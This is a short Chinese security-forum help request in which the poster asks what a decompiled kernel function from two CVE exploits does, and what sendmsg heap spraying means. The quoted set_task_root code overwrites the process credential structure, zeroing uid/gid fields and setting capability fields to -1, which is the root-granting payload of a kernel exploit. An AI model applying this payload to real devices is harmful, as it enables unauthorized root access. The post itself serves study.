-
-
[求助]提权代码疑问
-
发表于:
2017-7-20 17:34
3115
-
正在研究小白君的帖子
http://bbs.pediy.com/thread-210503.htm
发下两个CVE利用都有如下代码,这是通用的提权代码吗,只要能执行就可以root?含义是什么,看样子是改写某个结构体。
int set_task_root()
{
int i_task; // r1@1
int v1; // r2@6
int result; // r0@6
int v3; // [sp+0h] [bp-28h]@1
i_task = get_current_task();
do
{
i_task += 4;
}
while ( strcmp((char *)i_task ,"QQAA")!=0);
v1 = *(int *)(i_task - 8) + 4;
*(int *)v1 = 0;
*(int *)(v1 + 16) = 0;
*(int *)(v1 + 8) = 0;
*(int *)(v1 + 4) = 0;
*(int *)(v1 + 20) = 0;
*(int *)(v1 + 12) = 0;
*(int *)(v1 + 36) = -1;
*(int *)(v1 + 40) = -1;
*(int *)(v1 + 44) = -1;
*(int *)(v1 + 48) = -1;
*(int *)(v1 + 52) = -1;
*(int *)(v1 + 56) = -1;
*(int *)(v1 + 60) = -1;
*(int *)(v1 + 64) = -1;
result = 0xa;
return result;
}还有sendmsg堆喷是啥意思?
堆喷射大概了解。
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
